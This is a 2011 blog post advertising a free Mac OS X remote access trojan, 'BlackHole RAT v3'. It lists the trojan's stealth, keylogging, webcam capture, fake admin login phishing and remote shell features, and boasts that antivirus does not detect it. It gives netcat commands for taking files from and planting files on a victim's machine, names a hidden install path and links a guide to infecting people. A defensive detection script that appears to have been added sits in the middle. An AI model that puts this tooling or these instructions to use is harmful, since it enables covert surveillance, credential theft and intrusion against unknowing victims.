
Monday, June 20, 2011

BlackHole RAT Version 3 for Mac OS X

After a long time, here is the new version of BlackHole RAT.

For those who don't know what it is:

It's a RAT for Mac OS X.
I will upload the Windows Client soon!!!

Features of the new Version:


Server does automatically...
- Adds itself and the Keylogger to Startup
- Runs in Background with no Dock Icon and No MenuBar
- Installed Files are Hidden for the User
- Is not detected by the built-in Firewall
- Has Reverse Connection


What you can do when you are logged in...

- List all Processes
- Kill Processes
- Get Information about the Intet Interface
- Get Information about Network Connections
- Get HD Information
- Get User IDs
- Traceroute a Host or IP
- Get Up-Time
- List Kernel-Extensions
- Get System Information
- Get Hardware Information (Very detailed!)
- Hidden Spotlight Search
- Eject CD/DVD
- Get Information about inserted CD/DVD
- Burn a File to CD/DVD
- Erase inserted RW CD/DVD
- Scan for near Networks
- Get Information about current WLAN Connection (SSID, BSSID, Signal strength, etc.)
- Display Message on Victim's Screen
- Text to Speech (Read a given Text Message)
- Kill Finder.app (No Folders/Files are displayed for User)
- Open a Webpage
- Display Error Message
- Shutdown, Reboot, Sleep
- Take a ScreenShot (Without Sound)
- Take a Snapshot (Problem explained below)
- Record Video+Audio from iSight (Problem explained below)
- Display Faked Admin Login Window to Phish the Admin Pass
- Download Keylogger Logs
- Remote Shell


What can the Keylogger do?
It's only a very basic Keylogger, which is made for people who type very fast; otherwise some keys are captured twice. It also records only lowercase letters.

Currently it's all FUD, but I think it will not be for long. So I am releasing this for free, but I think I will make a private Version too for those of you who need a FUD Version ;)
The Windows Client will be uploaded soon.

There is a Read Me inside the Package which explains how to infect people, and here you can watch it:






Known Problems:


1. The green lamp is turned ON while using iSight!
2. While capturing a Video, the Computer makes strange, loud sounds!

3. The program to take Snapshots is not installed, you must upload it yourself!
4. Connections are not encrypted!! Only the File where the IP/Hostname is saved!
5. The Client may crash at first start, just restart it!

--- Small Tutorial: How to Transfer Files ---


1. This will most likely only work on Mac computers!
2. On your Computer, open a Terminal Window.
3. On the slave Computer, start the remote Shell.
4. Decide if you want to Upload or Download a File.

 Downloading

1. On your Computer run: nc -l porttolistenon > /file/to/save/to
2. On the Victim's Computer run: nc hostorip porttoconnect < /file/to/download
3. That's all.

 Uploading

1. On your Computer run: nc -l porttolistenon < /file/to/upload
2. On the Victim's Computer run: nc hostorip porttoconnect > /file/to/save
3. That's all.

How to Install the isightcapture Program


1. Connect to the slave
2. Upload the isightcapture program to: /Applications/.JavaUpdater/.Data/
3. Finished ;)
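
Seen from the defending side, the dot-prefixed install path named above and the startup entry from the feature list are both things a responder can look for on disk. The following is an added example, not part of the original post or the tool: a shell check that lists hidden directories directly under /Applications and any launchd plist that references them. Looking in the launchd folders is an assumption, since the post does not say which startup mechanism is used.

```shell
#!/bin/sh
# Added defensive example (not from the original post).
# Assumption: startup entries are searched for in launchd plist folders;
# the post does not name the persistence mechanism it uses.

# Print every dot-prefixed directory directly under an applications folder.
# Finder hides these, and normal installers do not place software there.
find_hidden_app_dirs() {
    root=${1:-/Applications}
    [ -d "$root" ] || return 0
    find "$root" -mindepth 1 -maxdepth 1 -type d -name '.*' 2>/dev/null | sort
}

# Print plists in the given folders that mention the given directory.
# grep -a reads binary plists as text so embedded path strings still match.
find_plists_referencing() {
    needle=$1; shift
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        grep -alF -- "$needle" "$dir"/*.plist 2>/dev/null || true
    done
}

# Report each hidden directory, the files inside it, and startup entries
# that point into it. Usage: scan_host [apps_root [launch_dir ...]]
scan_host() {
    apps=${1:-/Applications}
    if [ $# -gt 0 ]; then shift; fi
    if [ $# -eq 0 ]; then
        set -- "$HOME/Library/LaunchAgents" /Library/LaunchAgents /Library/LaunchDaemons
    fi
    find_hidden_app_dirs "$apps" | while IFS= read -r d; do
        echo "HIDDEN_DIR $d"
        find "$d" -type f 2>/dev/null | sed 's/^/  FILE /'
        find_plists_referencing "$d" "$@" | sed 's/^/  STARTUP /'
    done
}

scan_host "$@"
```

A clean system prints nothing; any HIDDEN_DIR line is worth a manual look before deciding it is malicious.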

Okay and here is the Download

The Password for the .zip File is:

Encrypt Method: AER-256 --> ATOM-128 --> GILA7 --> ZONG22 --> OKTO3

I hope you will like it!!!

I forgot something! After executing that command in Terminal to see hidden Files you must run the command: killall Finder

NOTE:
 I'm not responsible for any Damage you or your System/Computer might get. Don't use it for illegal purposes! You were warned.
